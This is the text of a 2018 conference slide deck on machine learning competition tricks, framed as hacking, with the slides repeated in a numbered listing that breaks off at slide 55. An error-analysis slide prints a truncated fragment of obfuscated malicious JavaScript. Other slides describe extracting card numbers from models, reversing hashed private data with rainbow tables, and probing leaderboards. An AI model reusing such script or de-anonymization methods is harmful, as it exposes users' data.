Hacking Predictive Modeling
HJ van Veen - Data Science & InfoSec @ Nubank
2
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich

Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank

• Competitive data science fanatic

• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.

• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.

• ML is powerful and easy: “Como toda descoberta científica
dá mais poderes sobre a natureza, ela pode aumentar o bem
ou o mal.” - César Lattes

• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.



acm.org/code-of-ethics
Scope
• This presentation will be all over the place. I don’t know if
you never trained a model before, or are experienced with
ML.

• But I hope this presentation will be interesting for the
hackers, makers, creators of all types.

• Catch me afterwards, if you want to talk about hyper
optimization.

What is AI?
What is AI?
Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
What is AI?
What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch
What is AI?
• AI grew out of Operations Research after WWII

• AI consists of many diverse subfields ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Just replace word `AI` with `Software`: If result
sounds silly or obvious, then the application of AI usually is
too. Power word: “What is your false positive rate?”.


What is Machine Learning?
• Automatically learn from data

• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.

Why Software Is Eating the World (2016, Andreessen Horowitz)
What is Predictive Modeling?
• Puts the focus on creating predictions:

• Use of model,
• how to use the data,
• how to get good accuracy.

• Essential to create a first solution. But the bare minimum to
what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output

• Connectionism: Learn from data bottom-up, not top-down
by stacking learning primitives.

• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.

• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.

• Perhaps we can model functional intelligence with
computers too?



Functionalism
Transform Model OutputInput
Reality Sensory Processing Mental Modeling Behavior
Data Feature Engineering Predictive Modeling Predictions
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.

• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning

• Perhaps we can model intelligence with network
architectures too?



Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Connectionism
Decision Demons
Cognitive Demons
Feature Demons
Image Demons
Pandemonium: A paradigm for learning. (Selfridge, 1959)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
• Don’t care if there is a magical deamon or a complex
maths formula in the box.
• Question then becomes: How to transform the data, how
to parametrize the black box, so to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Coding Theory
1 MegaByte 180 KiloByte
Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used

• Text and Sound and Images are unstructured

• Data can be temporal, for instance: time-series

• Rarely, data is in shape of a graph (for instance, relations
between gang members)
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.

Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables

• One-hot encoding for neural nets:





• Label encoding for decision trees:
Red
Green
Blue
1
2
3
Red
Green
Blue
Red Green Blue
1 0 0
0 1 0
0 0 1
Feature Engineering: Tricks
• That’s really (mostly) it!

• You can now apply the most advanced machine learning
algorithms to data and something you want to predict.

• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).

Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Modeling
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Modeling
Gender Likes Open Source? Wants RoadSec ticket?
0 1 ?
• Gender did not show any correlation and 3/4 of people
who Likes Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
Modeling
• What model do you use for data? 

• Tabular data: Gradient boosted decision trees (XGBoost)

• Images: Pre-trained deep neural net (or Detectron)

• Text: TFIDF -> Logistic Regression (or FastText, ULMNet,
BERT)
Search for above terms in combination with “machine learning”
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict
The Elements of Statistical Learning (2001, Friedman et al.)
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict
Evaluation
Predictions Wants RoadSec ticket?
1 1
1 1
1 0
1 1
0 0
0 0
0 0
0 0
7/8 Accuracy Score
Optimization
• A Python classifier may look like:



FactorizationMachineBinaryClassifier(iters=5,
learning_rate=0.1, latent_dim=20, radius=0.5,

lambda_linear=0.0001, lambda_latent=0.0001,
normalize='Auto', norm=True, caching='Auto',
shuffle=True, verbose=True)
Trick is to tweak these parameters to get a better evaluation.
Then stop when any change makes evaluation worse.
Brute Forcing
• View hyper parameter optimization as a password
cracking task

• Enumerate or randomly try all possible parameters within a
range.

• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.

• This is basically Random Search or Adaptive Search

Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?

• How about trying every possible combination of weights
and pick the best evaluation? Worst case: you spend 2
hours more compute.

KazAnova@kaggle
Brute Forcing
• Do we really need to manually train all these models?

• What would happen if we automatically train a 1000
random models with random data transformations and
throw them all into another black box?

• Out comes a winning Kaggle submission…


Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set.

• For every column in test set:
• randomly shuffle the column
• Evaluate the new predictions
• If evaluation is better with randomly shuffled features,
then you can safely discard the column.

 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easy-replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?

Warez
• Good tools: 

• allow you to experiment and iterate quickly

• have an active community contributing new features

• can be applied to many different problems with similar
results.

• abstract away complexity.

Python
• Grown to be essential to data science and machine
learning. 

• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code

PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
Python
from sklearn import datasets, ensemble
iris = datasets.load_iris()
X = iris.data
y = iris.target
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)

Scikit-Learn
• The Metasploit of Machine Learning

• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)

• Could get by for a while learning only this library very well

Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data: 

• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API

• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
Keras
User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.

• Alternatives: PyTorch with Fast.AI library



Deep Learning with Python (Chollet, 2017)
Vowpal Wabbit
• Very fast online learning on data bigger than memory

Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom filter
• Support for contextual bandits (automated decision
making)
• Eat raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas

• Fast, scalable and supports many types of data

• Perform vector operations on NumPy (or Numba) arrays

• Wide support for scientific calculations


Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.

• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF

• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->

State:New_York
Tricks as seen on the Kaggle forums
Reverse Engineering
• Use model predictions to reverse engineer the training
data.

• Simple brute-force can use fitted language models to
retrieve:
• Credit Card Numbers
• Social Security Numbers / CPF’s
• if it has seen this before once (DL is good at
memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You can not survive in most business
with just predictive modeling.

• Companies don’t hire an AutoML
solution, they hire people.

• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How to gain access to online data science community?

• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials/step-by-step’s.

• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor

• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show not tell: Save your most powerful models ‘till the
very last
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?

• Wacky Boosting:
• Keep changing your submission
• use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1

• Will horribly overfit, but can also cause others to overfit!
Competing in a data science contest without reading the data (2015, Hardt)
Information Snooping
• Normally not advisable to use the test set. But for
competitions the test is available, so:

• Can use semi-supervised learning to extract information
from the test set. Use test set for:

• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.

• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature.

• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!

• Local evaluation is your lifeline.

• Try everything, keep the good.

• Once I got an accuracy of 181% by
submitting correct answers twice.
Statisticians
Machine Learners
Smart
Machine Learner
(The joke is that there are only smart statisticians)
CV
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at finding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You can not use data that is not reasonably available at
test time (or your lifeline evaluation can not be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: The more powerful your model, the bigger chance
for exploiting any leakage left that you did not find.
• Most powerful model is a 1000 data scientists on a
typewriter, so that’s why competitions see larger leakage
discovery.

• A large sample of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of Microsoft malware binary classification 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running,
essential for iteration speed:
• Can spot very fast if some change was good or bad.
• Feels like NEO in the Matrix if you do this with the data
itself during data reading.
• Can spot data health issues (text encoding errors, all
missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• Below sample confidently predicted as minified JS when it
was actually obfuscated malicious JS:











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:

• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonimize users and obtain the ground truth.

• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.



Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter firing missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.

• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible or
more patient?
• Do you memorize your victim’s personal details?



Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check for how long user spend in funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
Botnet
• Much of commercial ML can or is being automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “A ciência não pode prever o que vai acontecer. Só pode
prever a probabilidade de algo acontecer.” - César Lattes

• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)

• No knowledge of particle physics is required.

• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Lets hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick best log loss model and lower the learning rate and
use early stopping to find the best amount of trees.
• Repeat above 3 times and average results
Position: 30/1785
Further Learning
• MOOC’s: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science Coursera, Abu-Mustafa Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find cool professor and study their online output
nubank.workable.com
Nubank is
hiring!

Hacking Predictive Modeling - RoadSec 2018

  • 1.
    Hacking Predictive Modeling HJvan Veen - Data Science & InfoSec @ Nubank
  • 2.
    2 “Do machine learninglike the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
 Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
  • 3.
    Who am I? •Thankful for the opportunity to speak here! • Data scientist & InfoSec analyst at Nubank
 • Competitive data science fanatic
 • Horrible Portuguese speaker (more so with public speaking). Questions and clarifications in English please.
 • @mlwave
  • 4.
    Disclaimer • These slidesare for entertainment, educational and research purposes only.
 • ML is powerful and easy: “Como toda descoberta científica dá mais poderes sobre a natureza, ela pode aumentar o bem ou o mal.” - César Lattes
 • Hacking is fun: But not a substitute for rigorous study and theory. Think of the impact your ML solution has on users.
 
 acm.org/code-of-ethics
  • 5.
    Scope • This presentationwill be all over the place. I don’t know if you never trained a model before, or are experienced with ML.
 • But I hope this presentation will be interesting for the hackers, makers, creators of all types.
 • Catch me afterwards, if you want to talk about hyper optimization.

  • 6.
  • 7.
    What is AI? Self-NormalizingNeural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
  • 8.
  • 9.
    What is AI? DeepVisual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.) Boy holds baseball bat Cat sits on couch
  • 10.
    What is AI? •AI grew out of Operations Research after WWII
 • AI consists of many diverse subfields ranging from: Psychology, Neuroscience, Mathematics, Linguistics, Learning Theory, (Quantum) Physics, Computer Science, Information Theory, Statistics, Robotics, Philosophy, Machine Learning. • Fight hype. Just replace word `AI` with `Software`: If result sounds silly or obvious, then the application of AI usually is too. Power word: “What is your false positive rate?”. 

  • 11.
    What is MachineLearning? • Automatically learn from data
 • Increased business usage: AI, Machine Learning, Software will continue eating the world. • Unsupervised learning (Amazon Recommendations). Supervised learning (Spam classification). Reinforcement learning & Self-supervision/Self-play (AlphaGo). • Consists of: Engineering, research, data management, domain expertise, analysis, decision science, safety, legal, ethics, UX, monitoring, predictive modeling.
 Why Software Is Eating the World (2016, Andreessen Horowitz)
  • 12.
    What is PredictiveModeling? • Puts the focus on creating predictions:
 • Use of model, • how to use the data, • how to get good accuracy.
 • Essential to create a first solution. But the bare minimum to what goes into Machine Learning at commercial scale. ML competitions are largely about predictive modeling.
  • 13.
    Useful Paradigms • Functionalism:Input -> Function -> Output
 • Connectionism: Learn from data bottom-up, not top-down by stacking learning primitives.
 • Black Box Learning: Let the machine do the work. Don’t care if I understand what it does.
 • Coding Theory: Error detection and compression
  • 14.
    Functionalism • Philosophy ofMind: Mental states are defined by how they function, not defined by what they are made of. • Function does not depend on the material: You can build a functional mouse trap from wood or metal.
 • Perhaps we can model functional intelligence with computers too?
 

  • 15.
    Functionalism Transform Model OutputInput RealitySensory Processing Mental Modeling Behavior Data Feature Engineering Predictive Modeling Predictions
  • 16.
    Connectionism • Philosophy ofMind: Cognition can arise by connecting functional nodes to form a network structure.
 • Artificial Neural Nets & Deep Learning are examples of this approach: Stacking layers of nodes for ever higher-level learning
 • Perhaps we can model intelligence with network architectures too?
 
 Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
  • 17.
    Connectionism Decision Demons Cognitive Demons FeatureDemons Image Demons Pandemonium: A paradigm for learning. (Selfridge, 1959)
  • 18.
    Black Box ML •View machine learning models as a black box: You only care about what goes in, and what goes out (its function). "A labrador retriever puppy with tongue hanging out"
  • 19.
    Black Box ML •View machine learning models as a black box: You only care about what goes in, and what goes out (its function). • Don’t care if there is a magical deamon or a complex maths formula in the box. • Question then becomes: How to transform the data, how to parametrize the black box, so to get the best predictions? • Remember: Garbage in - Garbage out (Don’t trust for critical stuff like healthcare or self-driving cars or AGI) The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
  • 20.
    Coding Theory • Codingtheory is concerned with effective communication and data integrity • Cryptography, Error Correction, Data Compression: All about finding (or hiding) the signal in the noise. • Machine Learning is essentially learning to correct errors. • Data compression, just like ML, is about finding the most relevant patterns.
  • 21.
  • 22.
    Data • Data canbe structured or unstructured. • Tabular data is structured and can more readily be used
 • Text and Sound and Images are unstructured
 • Data can be temporal, for instance: time-series
 • Rarely, data is in shape of a graph (for instance, relations between gang members)
  • 23.
    Feature Engineering • Mostdata needs to be converted to numbers first
 • Feature engineering:
 Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  • 24.
    Feature Engineering • Mostdata needs to be converted to numbers first
 • Feature engineering:
 • is transforming data into something a model can understand. • Creative part of ML with enough tricks to write a book • Has a few basic tricks that are enough to get most models to work well.
 Feature Extraction - Foundations and Applications (Guyon et al., 2006)
  • 25.
    Feature Engineering: Tricks •Categorical Variables
 • One-hot encoding for neural nets:
 
 
 • Label encoding for decision trees: Red Green Blue 1 2 3 Red Green Blue Red Green Blue 1 0 0 0 1 0 0 0 1
  • 26.
    Feature Engineering: Tricks •That’s really (mostly) it!
 • You can now apply the most advanced machine learning algorithms to data and something you want to predict.
 • More advanced feature engineering uses domain expertise, intuition, unsupervised learning/embeddings, and automation (see FeatureTools).
 Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
  • 27.
    Modeling • A modeltries to give accurate predictions for new unseen data. • It uses training data together with labels/ground truth/what you want to predict. Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  • 28.
    Modeling Gender Likes OpenSource? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  • 29.
    Modeling Gender Likes OpenSource? Wants RoadSec ticket? 0 1 ? • Gender did not show any correlation and 3/4 of people who Likes Open Source also wanted a RoadSec ticket. • A good model may predict a probability of 0.75, or a hard prediction of 1.
  • 30.
    Modeling • What modeldo you use for data? 
 • Tabular data: Gradient boosted decision trees (XGBoost)
 • Images: Pre-trained deep neural net (or Detectron)
 • Text: TFIDF -> Logistic Regression (or FastText, ULMNet, BERT) Search for above terms in combination with “machine learning”
  • 31.
    Evaluation Gender Likes OpenSource? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  • 32.
    Evaluation Gender Likes OpenSource? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict The Elements of Statistical Learning (2001, Friedman et al.)
  • 33.
    Evaluation Gender Likes OpenSource? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict
  • 34.
    Evaluation Predictions Wants RoadSecticket? 1 1 1 1 1 0 1 1 0 0 0 0 0 0 0 0 7/8 Accuracy Score
  • 35.
    Optimization • A Pythonclassifier may look like:
 
 FactorizationMachineBinaryClassifier(iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
 lambda_linear=0.0001, lambda_latent=0.0001, normalize='Auto', norm=True, caching='Auto', shuffle=True, verbose=True) Trick is to tweak these parameters to get a better evaluation. Then stop when any change makes evaluation worse.
  • 36.
    Brute Forcing • Viewhyper parameter optimization as a password cracking task
 • Enumerate or randomly try all possible parameters within a range.
 • Dictionary attack: Use “password dictionary files” with good parameters that worked on other problems. Try these first.
 • This is basically Random Search or Adaptive Search
 Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
  • 37.
    Brute Forcing • Howto find the best weights for an average ensemble? • Is it differentiable? • Which optimizer do we pick? • Do we set any regularization? • Allow negative weights?
 • How about trying every possible combination of weights and pick the best evaluation? Worst case: you spend 2 hours more compute.
 KazAnova@kaggle
  • 38.
    Brute Forcing • Dowe really need to manually train all these models?
 • What would happen if we automatically train a 1000 random models with random data transformations and throw them all into another black box?
 • Out comes a winning Kaggle submission… 
 Kaggle Ensembling Guide (van Veen et al., 2015)
  • 39.
    Fuzzing with Permutations •View feature interaction expansion/feature selection as a fuzzing task. • Train a model and evaluate on test set.
 • For every column in test set: • randomly shuffle the column • Evaluate the new predictions • If evaluation is better with randomly shuffled features, then you can safely discard the column. 
 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle See Fast.AI tutorial for more on this technique.
  • 40.
    Script kiddies • Usetools developed by others to attack a machine learning problem. • ML Community is incentivized to share easy-replicable code. • Wield same power as the biggest AI companies in the world. • No shame in this! Start somewhere, why not near the top?

  • 41.
    Warez • Good tools:
 • allow you to experiment and iterate quickly
 • have an active community contributing new features
 • can be applied to many different problems with similar results.
 • abstract away complexity.

  • 42.
    Python • Grown tobe essential to data science and machine learning. 
 • Learn Python The Hard Way and you have access to an amazing machine learning stack. • Then learn “one-- and preferably only one --obvious way to do it.” • Python code can read like pseudo-code
 PEP 20 — The Zen of Python (Peters, 2004) Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
  • 43.
    Python from sklearn importdatasets, ensemble iris = datasets.load_iris() X = iris.data y = iris.target model = ensemble.GradientBoostingClassifier() model.fit(X, y) p = model.predict(X)

  • 44.
    Scikit-Learn • The Metasploitof Machine Learning
 • Uses one API for all models (models are all trained the same way, so learn it only once, and have access to all models)
 • Could get by for a while learning only this library very well
 Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
  • 45.
    XGBoost • The bestfor tabular data: 
 • Extremely fast • Very good performance • Can model complex problems • Supports Scikit-Learn API
 • Alternatives: GradientBoostingClassifier, CatBoost, LightGBM. XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
  • 46.
    Keras User-friendly wrapper arounddeep learning libraries such as TensorFlow. • Learn Keras and you can work with the latest architectures in deep learning.
 • Alternatives: PyTorch with Fast.AI library
 
 Deep Learning with Python (Chollet, 2017)
  • 47.
    Vowpal Wabbit • Veryfast online learning on data bigger than memory
 Can be faster and more accurate than Hadoop/Spark • Uses cool hashing trick inspired by Bloom filter • Support for contextual bandits (automated decision making) • Eat raw features: • 1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005 A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
  • 48.
    Pandas & NumPy& SciPy • Read and manipulate tabular data with Pandas
 • Fast, scalable and supports many types of data
 • Perform vector operations on NumPy (or Numba) arrays
 • Wide support for scientific calculations 
 Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
  • 49.
    Reverse Engineering • Usefrequency tables to reverse engineer the data to its original form.
 • label:TF -> English_word_frequency(IDF(label)) -> Porter_Stemmer(word):TF*IDF
 • feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
 State:New_York Tricks as seen on the Kaggle forums
  • 50.
    Reverse Engineering • Usemodel predictions to reverse engineer the training data.
 • Simple brute-force can use fitted language models to retrieve: • Credit Card Numbers • Social Security Numbers / CPF’s • if it has seen this before once (DL is good at memorization) The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
  • 51.
    Social Engineering • Youcan not survive in most business with just predictive modeling.
 • Companies don’t hire an AutoML solution, they hire people.
 • The majority of the day-to-day complexity in the chain between data infrastructure and decision makers is social, not technical.
  • 52.
    Social Engineering • Howto gain access to online data science community?
 • Compete together. • Write a cool blog about it. • Write/contribute Open Source projects. • Write tutorials/step-by-step’s.
 • Basically share everything: A 100-line Python script (toy wrapper for Regularized Greedy Forest) could grow to a professional project that you now can use yourself. https://github.com/RGF-team/rgf
  • 53.
    Operational Security • Business: •Keep pipelines simple • Document & Revisit • Automate, Test & Monitor
 • Competitions: • Loose lips sink ships: Be careful what competitive advantage you share • Show not tell: Save your most powerful models ‘till the very last
  • 54.
    Hacking Leaderboards • Alwayswanted to rank #1 on a leaderboard?
 • Wacky Boosting: • Keep changing your submission • use leaderboard feedback to see if it was a good change or a bad change. • Keep good changes. • Repeat until you are #1
 • Will horribly overfit, but can also cause others to overfit! Competing in a data science contest without reading the data (2015, Hardt)
  • 55.
    Information Snooping • Normallynot advisable to use the test set. But for competitions the test is available, so:
